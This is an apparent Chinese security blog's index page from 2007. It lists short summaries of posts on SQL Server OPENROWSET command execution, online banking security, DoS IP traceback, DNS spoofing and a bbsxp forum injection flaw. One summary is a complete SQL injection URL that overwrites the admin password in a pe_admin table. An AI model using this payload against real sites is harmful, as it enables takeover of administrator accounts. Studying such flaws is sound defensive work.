2007年7月3日
摘要:
下面我要谈到一些Sqlserver新的Bug,虽然本人经过长时间的努力,当然也有点幸运的成分在内,才得以发现,不敢一个人独享,拿出来请大家鉴别。 1.关于Openrowset和Opendatasource 可能这个技巧早有人已经会了,就是利用openrowset发送本地命令。通常我们的用法是(包括MSDN的列子)如下: ... 阅读全文
posted @ 2007-07-03 10:05
%5C
阅读(313)
评论(0)
推荐(0)
摘要:
前言:本文还是去年年初写的,当时出于安全考虑没放出来。现在部分网上银行已大幅度降低了无高级别安全措施情况下的转账限额,并建议用户使用动态口令卡或者USB Key,总体安全系数有所提高。 随着子商务的普及,网上银行以及在线电子支付等方式逐渐被网民所接受和喜爱。但是网上银行以及电子商务支付平台的安全性不容乐观。尽管各网上银行采取SSL加密防止通过嗅探网络封包的方式截取密码;对于防止WEB登陆时密码... 阅读全文
posted @ 2007-07-03 09:52
%5C
阅读(733)
评论(2)
推荐(0)
摘要:
摘 要 拒绝服务攻击(DoS)给政府部门和商业机构造成了严重的经济损失和社会威胁。IP追踪技术能够反向追踪IP数据包到它
们的源头,所以是识别和阻止DoS攻击的重要一步。本文针对DoS攻击,对比分析了各个IP反向追踪方法的基本原理和优缺点。
关键词 DoS攻击 主动追踪 反应追踪 阅读全文
posted @ 2007-07-03 09:46
%5C
阅读(2994)
评论(0)
推荐(0)
摘要:
http://192.168.1.254/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=3);%20declare%20@a%20sysname%20select%20@a=0x3300%20update%20pe_admin%20set%20password=@a%20where%20id=1--); declare @a... 阅读全文
posted @ 2007-07-03 08:59
%5C
阅读(423)
评论(2)
推荐(0)
摘要:
概述:什么是DNS欺骗?DNS欺骗是一门改变DNS原始指向IP的艺术。为了更好的理解,让我们先来看一个例子。如果你想用浏览器去google搜索一些信息,毫无疑问的你会在地址栏里输入 www.google.com的网址然后回车。那么在这背后又有什么事情正在进行着呢?一般而言,你的浏览器将会向DNS服务器发送一个请求,从而要求得到与www.google.com相匹配的IP地址,DNS服务器则会告诉你的... 阅读全文
posted @ 2007-07-03 08:51
%5C
阅读(582)
评论(0)
推荐(0)
摘要:
1、 bbsxp 2007斑竹权限注射 moderation.asp中的这些代码if Request.ServerVariables("Request_method") = "POST" thenselect case Request.Form("Item")case "BatchDel"IsDel=Request.Form("IsDel")for each ho in Request.Form(... 阅读全文
posted @ 2007-07-03 08:51
%5C
阅读(939)
评论(1)
推荐(0)
浙公网安备 33010602011771号